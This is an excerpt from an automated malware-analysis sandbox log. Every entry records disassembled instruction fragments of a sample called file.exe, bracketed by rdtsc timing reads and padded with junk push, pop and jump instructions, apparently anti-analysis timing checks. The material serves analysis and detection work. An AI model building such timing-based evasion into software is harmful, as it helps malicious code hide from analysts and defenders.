Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5BC6 second address: AE5BCB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5BCB second address: AE5BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5D75 second address: AE5D7B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE61D0 second address: AE61DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE61DB second address: AE61E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE61E1 second address: AE61E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE61E5 second address: AE61F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F4DA4C5D846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9EC2A second address: A9EC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4DA4C5B316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6342 second address: AE635A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5D854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE64E5 second address: AE64F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE64F0 second address: AE64FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE64FA second address: AE651D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B31Fh 0x00000009 jno 00007F4DA4C5B316h 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007F4DA4C5B316h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEB008 second address: AEB01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5D851h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A55D99 second address: A55D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA464 second address: AEA46E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA62A second address: AEA62E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA62E second address: AEA659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F4DA4C5D85Ah 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA66 second address: AEAA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B324h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA81 second address: AEAA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE32B second address: AEE32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE48C second address: AEE4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D852h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4DA4C5D84Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEE4B4 second address: AEE4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jbe 00007F4DA4C5B316h 0x0000000e popad 0x0000000f push edx 0x00000010 jnp 00007F4DA4C5B316h 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF684A second address: AF6856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4DA4C5D846h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF6856 second address: AF687A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4DA4C5B321h 0x0000000d jmp 00007F4DA4C5B31Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A12 second address: AF4A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A17 second address: AF4A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B326h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F4DA4C5B34Ah 0x00000012 pushad 0x00000013 js 00007F4DA4C5B316h 0x00000019 push edx 0x0000001a pop edx 0x0000001b jmp 00007F4DA4C5B31Bh 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A55 second address: AF4A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5CBE second address: AF5CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B322h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5CD6 second address: AF5CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5CDB second address: AF5D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F4DA4C5B31Ah 0x0000000a jmp 00007F4DA4C5B31Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F4DA4C5B316h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5D01 second address: AF5D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF6276 second address: AF627A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF972A second address: AF9745 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F4DA4C5D84Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9745 second address: AF9758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B31Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9758 second address: AF977B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F4DA4C5D846h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF977B second address: AF977F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9A2B second address: AF9A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4DA4C5D84Ch 0x0000000d popad 0x0000000e jmp 00007F4DA4C5D856h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9A59 second address: AF9A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B31Fh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFA007 second address: AFA00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFA152 second address: AFA172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B326h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B00118 second address: B00123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4DA4C5D846h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B00123 second address: B00136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F4DA4C5B31Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B068F0 second address: B06924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F4DA4C5D846h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4DA4C5D84Dh 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4DA4C5D855h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06924 second address: B0693C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F4DA4C5B316h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F4DA4C5B316h 0x00000012 jp 00007F4DA4C5B316h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06D29 second address: B06D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B074E9 second address: B074F8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4DA4C5B316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B074F8 second address: B074FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B074FE second address: B0750B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4DA4C5B316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0750B second address: B07527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4DA4C5D846h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F4DA4C5D84Ch 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B131D5 second address: B131E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4DA4C5B31Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12EDA second address: B12EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12EE2 second address: B12EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4DA4C5B316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12EEC second address: B12EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12EFD second address: B12F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B12F07 second address: B12F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1FA39 second address: B1FA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1FA43 second address: B1FA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B22C64 second address: B22C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B22C68 second address: B22C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B28506 second address: B2850B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2850B second address: B2852B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4DA4C5D84Eh 0x00000008 jbe 00007F4DA4C5D846h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4DA4C5D84Ch 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2852B second address: B2852F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2867C second address: B286A1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4DA4C5D848h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4DA4C5D855h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B286A1 second address: B286A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B286A9 second address: B286B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F4DA4C5D846h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B286B9 second address: B286BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36771 second address: B36777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B365CA second address: B365DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F4DA4C5B316h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B365DB second address: B365E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B365E5 second address: B365EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B365EA second address: B365F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4DA4C5D846h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B365F6 second address: B365FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3CE67 second address: B3CE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4DA4C5D846h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F4DA4C5D857h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3CE8E second address: B3CE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3CFFF second address: B3D004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D004 second address: B3D01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F4DA4C5B316h 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F4DA4C5B316h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D01C second address: B3D022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D156 second address: B3D167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jl 00007F4DA4C5B316h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D167 second address: B3D181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D856h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D181 second address: B3D187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D187 second address: B3D19B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F4DA4C5D846h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3D2D8 second address: B3D2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B322h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F4DA4C5B316h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B410AE second address: B410DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4DA4C5D855h 0x0000000b pushad 0x0000000c jp 00007F4DA4C5D846h 0x00000012 jbe 00007F4DA4C5D846h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007F4DA4C5D846h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40C3A second address: B40C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B329h 0x00000009 pushad 0x0000000a jg 00007F4DA4C5B316h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 js 00007F4DA4C5B316h 0x00000018 popad 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5616E second address: B5618C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Bh 0x00000007 jng 00007F4DA4C5D848h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5618C second address: B56190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55FCF second address: B56012 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4DA4C5D853h 0x0000000f pushad 0x00000010 jmp 00007F4DA4C5D852h 0x00000015 jmp 00007F4DA4C5D850h 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63F38 second address: B63F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B326h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63F52 second address: B63F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63F58 second address: B63F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jnp 00007F4DA4C5B31Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B63AFB second address: B63B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D428 second address: B7D446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F4DA4C5B31Ch 0x00000010 push edx 0x00000011 jno 00007F4DA4C5B316h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D59F second address: B7D5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5D84Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D99D second address: B7D9B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DDA2 second address: B7DDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5D84Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DDB8 second address: B7DDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E03C second address: B7E041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
